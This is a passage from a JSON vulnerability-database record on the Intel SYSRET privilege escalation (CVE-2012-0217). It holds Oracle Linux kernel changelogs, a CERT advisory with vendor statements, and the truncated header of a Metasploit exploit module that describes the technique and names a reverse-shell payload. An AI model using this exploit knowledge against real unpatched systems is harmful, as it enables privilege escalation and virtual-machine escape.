{"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:19", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "kernel:\n[2.6.18-308.8.2.0.1.el5]\n- [net] bonding: fix carrier detect when bond is down [orabug 12377284]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- [scsi] fix scsi hotplug and rescan race [orabug 10260172]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] shrink_zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [rds] Patch rds to 1.4.2-20 (Andy Grover) [orabug 9471572, 9344105]\n RDS: Fix BUG_ONs to not fire when in a tasklet\n ipoib: Fix lockup of the tx queue\n RDS: Do not call set_page_dirty() with irqs off (Sherman Pun)\n RDS: Properly unmap when getting a remote access error (Tina Yang)\n RDS: Fix locking in rds_send_drop_to()\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n+- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for el5 (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n[2.6.18-308.8.2.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970]\nocfs2:\n[1.4.10]\n- ocfs2/dlm: Cleanup mlogs in dlmthread.c dlmast.c and dlmdomain.c\n- ocfs2/dlm: make existing convertion precedent over new lock\n- ocfs2/dlm: Cleanup dlmdebug.c\n- ocfs2/dlm: Minor cleanup\n- ocfs2/dlm: Hard code the values for enums\n- ocfs2: Wakeup down convert thread just after clearing OCFS2 LOCK UPCONVERT FINISHING\n- ocfs2/dlm: Take inflight reference count for remotely mastered resources too\n- ocfs2/dlm: dlmlock remote needs to account for remastery\n- ocfs2: Add some trace log for orphan scan\n- ocfs2: Remove unused old id in ocfs2_commit_cache\n- ocfs2: Remove obsolete comments before ocfs2_start_trans\n- ocfs2: Initialize the bktcnt variable properly and call it bucket_count\n- ocfs2: Use cpu to le16 for e leaf clusters in ocfs2_bg_discontig_add_extent\n- ocfs2: validate bg free bits count after update\n- ocfs2: cluster Pin the remote node item in configfs\n- ocfs2: Release buffer head in case of error in ocfs2_double_lock\n- ocfs2: optimize ocfs2 check dir entry with unlikely() annotations\n- ocfs2: Little refactoring against ocfs2 iget\n- ocfs2: Initialize data ac might be used uninitializ\n- ocfs2 Skip mount recovery for hard ro mounts\n- ocfs2: make direntry invalid when deleting it\n- ocfs2: commit trans in error\n- ocfs2: Fix deadlock when allocating page\n- ocfs2: Avoid livelock in ocfs2 readpage", "edition": 5, "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "ELSA-2012-0721-1", "href": "http://linux.oracle.com/errata/ELSA-2012-0721-1.html", "title": "1 ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:00", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "kernel:\n[2.6.18-308.8.2.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970]\nocfs2:\n[1.4.10]\n- ocfs2/dlm: Cleanup mlogs in dlmthread.c dlmast.c and dlmdomain.c\n- ocfs2/dlm: make existing convertion precedent over new lock\n- ocfs2/dlm: Cleanup dlmdebug.c\n- ocfs2/dlm: Minor cleanup\n- ocfs2/dlm: Hard code the values for enums\n- ocfs2: Wakeup down convert thread just after clearing OCFS2 LOCK UPCONVERT FINISHING\n- ocfs2/dlm: Take inflight reference count for remotely mastered resources too\n- ocfs2/dlm: dlmlock remote needs to account for remastery\n- ocfs2: Add some trace log for orphan scan\n- ocfs2: Remove unused old id in ocfs2_commit_cache\n- ocfs2: Remove obsolete comments before ocfs2_start_trans\n- ocfs2: Initialize the bktcnt variable properly and call it bucket_count\n- ocfs2: Use cpu to le16 for e leaf clusters in ocfs2_bg_discontig_add_extent\n- ocfs2: validate bg free bits count after update\n- ocfs2: cluster Pin the remote node item in configfs\n- ocfs2: Release buffer head in case of error in ocfs2_double_lock\n- ocfs2: optimize ocfs2 check dir entry with unlikely() annotations\n- ocfs2: Little refactoring against ocfs2 iget\n- ocfs2: Initialize data ac might be used uninitializ\n- ocfs2 Skip mount recovery for hard ro mounts\n- ocfs2: make direntry invalid when deleting it\n- ocfs2: commit trans in error\n- ocfs2: Fix deadlock when allocating page\n- ocfs2: Avoid livelock in ocfs2 readpage", "edition": 4, "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "ELSA-2012-0721", "href": "http://linux.oracle.com/errata/ELSA-2012-0721.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:42", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934", "CVE-2012-3375"], "description": "[2.6.18-308.11.1.0.1.el5]\n- [net] bonding: fix carrier detect when bond is down [orabug 12377284]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- [scsi] fix scsi hotplug and rescan race [orabug 10260172]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] shrink_zone patch (John Sobecki,Chris Mason) [orabug 6086839]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [rds] Patch rds to 1.4.2-20 (Andy Grover) [orabug 9471572, 9344105]\n RDS: Fix BUG_ONs to not fire when in a tasklet\n ipoib: Fix lockup of the tx queue\n RDS: Do not call set_page_dirty() with irqs off (Sherman Pun)\n RDS: Properly unmap when getting a remote access error (Tina Yang)\n RDS: Fix locking in rds_send_drop_to()\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n+- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for el5 (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n[2.6.18-308.11.1.el5]\n- [net] ixgbe: remove flow director stats (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: fix default return value for ixgbe_cache_ring_fdir (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: reverting setup redirection table for multiple packet buffers (Andy Gospodarek) [832169 830226]\n[2.6.18-308.10.1.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970] {CVE-2012-2934}\n- [scsi] qla2xxx: Use ha->pdev->revision in 4Gbps MSI-X check. (Chad Dupuis) [816373 800653]\n- [fs] sunrpc: do array overrun check in svc_recv before page alloc (J. Bruce Fields) [820358 814626]\n- [fs] knfsd: fix an NFSD bug with full size non-page-aligned reads (J. Bruce Fields) [820358 814626]\n- [fs] sunrpc: fix oops due to overrunning server's page array (J. Bruce Fields) [820358 814626]\n- [fs] epoll: clear the tfile_check_list on -ELOOP (Jason Baron) [829670 817131]\n- [x86_64] sched: Avoid unnecessary overflow in sched_clock (Prarit Bhargava) [824654 818787]\n- [net] sunrpc: Don't use list_for_each_entry_safe in rpc_wake_up (Steve Dickson) [817571 809937]\n- [s390] qeth: add missing wake_up call (Hendrik Brueckner) [829059 790900]\n[2.6.18-308.9.1.el5]\n- [fs] jbd: clear b_modified before moving the jh to a different transaction (Josef Bacik) [827205 563247]", "edition": 5, "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "ELSA-2012-1061-1", "href": "http://linux.oracle.com/errata/ELSA-2012-1061-1.html", "title": "1 ", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:28", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-2934", "CVE-2012-3375"], "description": "[2.6.18-308.11.1.el5]\n- [net] ixgbe: remove flow director stats (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: fix default return value for ixgbe_cache_ring_fdir (Andy Gospodarek) [832169 830226]\n- [net] ixgbe: reverting setup redirection table for multiple packet buffers (Andy Gospodarek) [832169 830226]\n[2.6.18-308.10.1.el5]\n- [xen] x86_64: check address on trap handlers or guest callbacks (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86_64: Do not execute sysret with a non-canonical return address (Paolo Bonzini) [813430 813431] {CVE-2012-0217}\n- [xen] x86: prevent hv boot on AMD CPUs with Erratum 121 (Laszlo Ersek) [824969 824970] {CVE-2012-2934}\n- [scsi] qla2xxx: Use ha->pdev->revision in 4Gbps MSI-X check. (Chad Dupuis) [816373 800653]\n- [fs] sunrpc: do array overrun check in svc_recv before page alloc (J. Bruce Fields) [820358 814626]\n- [fs] knfsd: fix an NFSD bug with full size non-page-aligned reads (J. Bruce Fields) [820358 814626]\n- [fs] sunrpc: fix oops due to overrunning server's page array (J. Bruce Fields) [820358 814626]\n- [fs] epoll: clear the tfile_check_list on -ELOOP (Jason Baron) [829670 817131]\n- [x86_64] sched: Avoid unnecessary overflow in sched_clock (Prarit Bhargava) [824654 818787]\n- [net] sunrpc: Don't use list_for_each_entry_safe in rpc_wake_up (Steve Dickson) [817571 809937]\n- [s390] qeth: add missing wake_up call (Hendrik Brueckner) [829059 790900]\n[2.6.18-308.9.1.el5]\n- [fs] jbd: clear b_modified before moving the jh to a different transaction (Josef Bacik) [827205 563247]", "edition": 4, "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "ELSA-2012-1061", "href": "http://linux.oracle.com/errata/ELSA-2012-1061.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:51", "bulletinFamily": "info", "cvelist": ["CVE-2006-0744", "CVE-2012-0217", "CVE-2012-0218"], "description": "### Overview \n\nSome 64-bit operating systems and virtualization software running on Intel CPU hardware are vulnerable to a local privilege escalation attack. The vulnerability may be exploited for local privilege escalation or a guest-to-host virtual machine escape.\n\nIntel claims that this vulnerability is a software implementation issue, as their processors are functioning as per their documented specifications. However, software that fails to take the Intel-specific SYSRET behavior into account may be vulnerable.\n\n### Description \n\nA [ring3 attacker](<http://en.wikipedia.org/wiki/Ring_3>) may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP). The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation. \n \n**Details from Xen** \n \n[_CVE-2012-0217 / XSA-7 - 64-bit PV guest privilege escalation vulnerability_](<http://lists.xen.org/archives/html/xen-announce/2012-06/msg00001.html>) \n \n_A vulnerability which can allow a 64-bit PV guest kernel running on a 64-bit hypervisor to escalate privileges to that of the host by arranging for a system call to return via sysret to a non-canonical RIP. Intel CPUs deliver the resulting exception in an undesirable processor state._ \n \n**Details from FreeBSD** \n \n[_FreeBSD-SA-12:04.sysret:__ __Privilege escalation when returning from kernel_](<http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc>) \n \n_FreeBSD/amd64 runs on CPUs from different vendors. Due to varying behaviour of CPUs in 64 bit mode a sanity check of the kernel may be insufficient when returning from a system call. Successful exploitation of the problem can lead to local kernel privilege escalation, kernel data corruption and/or crash._ \n \n**Details from Microsoft** \n \n[_User Mode Scheduler Memory Corruption Vulnerability - __MS12-042 - Important_](<http://technet.microsoft.com/en-us/security/bulletin/MS12-042>) \n \n_An elevation of privilege vulnerability exists in the way that the Windows User Mode Scheduler handles system requests. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full administrative rights._ \n \n_Mitigating Factors for User Mode Scheduler Memory Corruption Vulnerability_ \n \n_Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation: _\n\n * _An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users._\n * _This vulnerability only affects Intel x64-based versions of Windows 7 and Windows Server 2008 R2._\n * _Systems with AMD or ARM-based CPUs are not affected by this vulnerability._\n \n**Details from Red Hat** \n \n[_RHSA-2012:0720-1_](<https://rhn.redhat.com/errata/RHSA-2012-0720.html>)_ & _[_RHSA-2012:0721-1_](<https://rhn.redhat.com/errata/RHSA-2012-0721.html>)_: __It was found that the Xen hypervisor implementation as shipped with Red Hat Enterprise Linux 5 did not properly restrict the syscall return addresses in the sysret return path to canonical addresses. An unprivileged user in a 64-bit para-virtualized guest, that is running on a 64-bit host that has an Intel CPU, could use this flaw to crash the host or, potentially, escalate their privileges, allowing them to execute arbitrary code at the hypervisor level. (CVE-2012-0217, Important)_ \n \nDetails from some affected vendors were not available at the time of publication. \n--- \n \n### Impact \n\nA local authenticated attacker may exploit this vulnerability for operating system privilege escalation or for a guest-to-host virtual machine escape. \n \n--- \n \n### Solution \n\n**Apply an Update** \nPlease review the Vendor Information section of this document for vendor-specific patch and workaround details. \n \n--- \n \n### Vendor Information\n\n649219\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Citrix __ Affected\n\nUpdated: June 18, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nA number of security vulnerabilities have been identified in Citrix XenServer. These vulnerabilities affect all currently supported versions of Citrix XenServer up to and including version 6.0.2.\n\nThe following issues have been addressed: \n \n\u2022 64-bit PV guest to host privilege escalation vulnerability. This issue only impacts servers running on Intel processors and could permit a 64-bit PV guest to compromise the XenServer host (CVE-2012-0217). \n \n\u2022 Guest denial of service on syscall/sysenter exception generation. This issue could permit user code within a PV guest to crash the guest operating system (CVE-2012-0218). \n \n\u2022 Administrative connections to VM consoles through XAPI or XenCenter could be routed to the wrong VM.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.citrix.com/article/CTX133161>\n\n### FreeBSD Project Affected\n\nNotified: May 01, 2012 Updated: June 12, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc>\n\n### Intel Corporation __ Affected\n\nNotified: May 01, 2012 Updated: June 13, 2012 \n\n**Statement Date: June 13, 2012**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThis is a software implementation issue. Intel processors are functioning as per specifications and this behavior is correctly documented in the IntelR64 Software Developers Manual, Volume 2B Pages 4-598-599.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Joyent __ Affected\n\nUpdated: June 14, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have an illumos-derived system, SmartOS -- it (and every other illumos derivative) was affected by this vulnerability. illumos issue: <https://www.illumos.org/issues/2873>\n\nPatch is in hg changeset: 13724:7740792727e0. This can also be found on the github bridge: <https://github.com/illumos/illumos-gate/commit/6ba2dbf5e79c7fc6e1221844ddaa2c88a42a3fc1> \n \nJoyent's cloud customers are unaffected. Joyent's SmartDataCenter customers will be receiving an updated platform, versioned joyent_20120614T001014Z.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.illumos.org/issues/2873>\n * <https://github.com/illumos/illumos-gate/commit/6ba2dbf5e79c7fc6e1221844ddaa2c88a42a3fc1>\n\n### Microsoft Corporation __ Affected\n\nNotified: May 01, 2012 Updated: June 18, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThis security update resolves one privately reported vulnerability and one publicly disclosed vulnerability in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that exploits the vulnerability. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.\n\n### Vendor References\n\n * <https://technet.microsoft.com/en-us/security/bulletin/MS12-042>\n\n### NetBSD Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Oracle Corporation Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n**Statement Date: May 11, 2012**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. Affected\n\nNotified: May 01, 2012 Updated: June 12, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=813428>\n * <https://access.redhat.com/security/cve/CVE-2012-0217>\n * <https://rhn.redhat.com/errata/RHSA-2012-0720.html>\n * <https://rhn.redhat.com/errata/RHSA-2012-0721.html>\n\n### SUSE Linux Affected\n\nNotified: May 02, 2012 Updated: June 12, 2012 \n\n**Statement Date: May 02, 2012**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2012-0217.html>\n\n### Xen Affected\n\nNotified: May 02, 2012 Updated: June 12, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.xen.org/archives/html/xen-announce/2012-06/msg00001.html>\n\n### AMD __ Not Affected\n\nUpdated: June 13, 2012 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSystems using AMD CPUs are not vulnerable to this privilege escalation. AMD have issued the following statement:\n\n \n_ AMD processors' SYSRET behavior is such that a non-canonical address in RCX does not generate a #GP while in CPL0. We have verified this with our architecture team, with our design team, and have performed tests that verified this on silicon. Therefore, this privilege escalation exposure is not applicable to any AMD processor._ \nThis statement comes from the Xen security advisory. \n\n### Apple Inc. Not Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n**Statement Date: May 15, 2012**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenBSD Not Affected\n\nUpdated: June 25, 2012 \n\n**Statement Date: June 25, 2012**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### VMware __ Not Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n**Statement Date: June 08, 2012**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe VMware Security Response Center has reviewed the technical details of CVE-2012-0217, the \"#GP in sysret\" vulnerability. The \"sysret\" instruction is not used in VMware hypervisor code, therefore VMware products are not affected by this issue. Please note that guest operating systems that are installed as virtual machines may be affected and should be patched based on the recommendation of their respective OS vendors.\n\nFor further questions on this or any security vulnerability, please contact the VSRC at security@vmware.com.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: May 01, 2012 Updated: May 01, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: May 01, 2012 Updated: May 01, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Parallels Holdings Ltd Unknown\n\nNotified: May 21, 2012 Updated: May 21, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: May 01, 2012 Updated: May 01, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 22 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.6 | AV:L/AC:M/Au:S/C:C/I:C/A:C \nTemporal | 5.5 | E:F/RL:OF/RC:C \nEnvironmental | 5.5 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://en.wikipedia.org/wiki/Ring_3>\n * <http://lists.xen.org/archives/html/xen-announce/2012-06/msg00001.html>\n * <http://blog.xen.org/index.php/2012/06/13/the-intel-sysret-privilege-escalation/>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=813428>\n * <http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc>\n * <http://blog.gmane.org/gmane.linux.kernel.commits.2-4/month=20060401>\n * <http://lists.xen.org/archives/html/xen-devel/2012-06/msg01072.html>\n * <http://www.vupen.com/blog/20120904.Advanced_Exploitation_of_Xen_Sysret_VM_Escape_CVE-2012-0217.php>\n\n### Acknowledgements\n\nThanks to Rafal Wojtczuk of Bromium, Inc. for reporting this vulnerability.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-0217](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-0217>), [CVE-2006-0744](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-0744>) \n---|--- \n**Date Public:** | 2006-04-12 \n**Date First Published:** | 2012-06-12 \n**Date Last Updated: ** | 2012-09-04 20:47 UTC \n**Document Revision: ** | 88 \n", "modified": "2012-09-04T20:47:00", "published": "2012-06-12T00:00:00", "id": "VU:649219", "href": "https://www.kb.cert.org/vuls/id/649219", "type": "cert", "title": "SYSRET 64-bit operating system privilege escalation vulnerability on Intel CPU hardware", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-03-07T15:18:36", "description": "", "published": "2019-03-07T00:00:00", "type": "exploitdb", "title": "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2019-03-07T00:00:00", "id": "EDB-ID:46508", "href": "https://www.exploit-db.com/exploits/46508", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'FreeBSD Intel SYSRET Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the FreeBSD kernel,\r\n when running on 64-bit Intel processors.\r\n\r\n By design, 64-bit processors following the X86-64 specification will\r\n trigger a general protection fault (GPF) when executing a SYSRET\r\n instruction with a non-canonical address in the RCX register.\r\n\r\n However, Intel processors check for a non-canonical address prior to\r\n dropping privileges, causing a GPF in privileged mode. As a result,\r\n the current userland RSP stack pointer is restored and executed,\r\n resulting in privileged code execution.\r\n\r\n This module has been tested successfully on:\r\n\r\n FreeBSD 8.3-RELEASE (amd64); and\r\n FreeBSD 9.0-RELEASE (amd64).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Rafal Wojtczuk', # Discovery\r\n 'John Baldwin', # Discovery\r\n 'iZsh', # Exploit\r\n 'bcoles' # Metasploit\r\n ],\r\n 'DisclosureDate' => '2012-06-12',\r\n 'Platform' => ['bsd'],\r\n 'Arch' => [ARCH_X64],\r\n 'SessionTypes' => ['shell'],\r\n 'References' =>\r\n [\r\n ['BID', '53856'],\r\n ['CVE', '2012-0217'],\r\n ['EDB', '28718'],\r\n ['PACKETSTORM', '113584'],\r\n ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],\r\n ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],\r\n ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],\r\n ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],\r\n ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],\r\n ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']\r\n ],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },\r\n 